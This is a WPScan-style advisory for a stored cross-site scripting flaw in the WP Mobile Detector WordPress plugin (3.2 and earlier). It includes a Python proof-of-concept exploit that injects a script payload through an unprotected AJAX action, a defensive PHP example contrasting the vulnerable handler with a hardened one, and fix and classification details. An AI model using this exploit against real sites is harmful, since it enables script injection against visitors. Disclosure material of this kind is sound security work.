WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)


Description
The WP Mobile Detector plugin exposes the AJAX action 'websitez_options' to all registered users (line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php). Submitting specially crafted form values results in a persistent XSS attack against mobile visitors.
Proof of Concept
import requests

# Session keeps the WordPress auth cookies between the two requests.
s = requests.session()
target = 'http://localhost'

# Step 1: log in as an ordinary registered user (no elevated role needed).
url = '%s/wp-login.php' % target
payload = {
        "log": "test",
        "pwd": "test",
        "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the unprotected AJAX action; the mobile_title value is stored
# unsanitized and later rendered into the <title> of the mobile theme.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
        "action": "websitez_options",
        "general[selected_mobile_theme]": "wz-mobile",
        "general[mobile_title]": "</title><script>alert(1)</script><title>"
}
r = s.post(url, data=payload)
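The handler pattern behind this advisory, from the defender's side, as an added example that is not the plugin's own code: the weak shape (any logged-in user can store unsanitized values that are later echoed into the page) next to a hardened one that checks capability and nonce, sanitizes on input and escapes on output. The function names, the option key 'wz_general' and the nonce action 'wz_options' are assumptions; the WordPress API calls are real.

```php
<?php
// Added example, not the plugin's code. Names marked below are assumptions.

// Weak pattern: wp_ajax_* fires for every logged-in user, and nothing here
// checks capability, nonce, or the contents of the submitted values.
function wz_options_unsafe() {
    $general = isset( $_POST['general'] ) ? (array) $_POST['general'] : array();
    update_option( 'wz_general', $general );   // stored verbatim ('wz_general' assumed)
    wp_die();
}

// Hardened form: administrators only, nonce required, input sanitized.
function wz_options_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    check_ajax_referer( 'wz_options', 'nonce' );   // dies on missing/invalid nonce

    $general = isset( $_POST['general'] ) ? (array) $_POST['general'] : array();
    $theme   = isset( $general['selected_mobile_theme'] ) ? $general['selected_mobile_theme'] : '';
    $title   = isset( $general['mobile_title'] ) ? $general['mobile_title'] : '';

    $clean = array(
        'selected_mobile_theme' => sanitize_key( $theme ),          // [a-z0-9_-] only
        'mobile_title'          => sanitize_text_field( $title ),   // tags stripped
    );
    update_option( 'wz_general', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_websitez_options', 'wz_options_safe' );

// Escape on output too, so a value stored before the fix cannot break out of <title>.
function wz_render_title() {
    $general = get_option( 'wz_general', array() );
    $title   = isset( $general['mobile_title'] ) ? $general['mobile_title'] : '';
    echo '<title>' . esc_html( $title ) . '</title>';
}
```

With both layers in place, the PoC value above is reduced to plain text on input and, even if it were already in the database, rendered as `&lt;/title&gt;...` rather than as markup.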

Affects

Plugin wp-mobile-detector
fixed in version 3.3

References

URL https://research.g0blin.co.uk/g0blin-00050/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 126
Verified No
WPVDB ID 8059

Timeline

Publicly Published 2015-06-25 (over 1 year ago)
Added 2015-06-25 (over 1 year ago)
Last Updated 2015-06-25 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.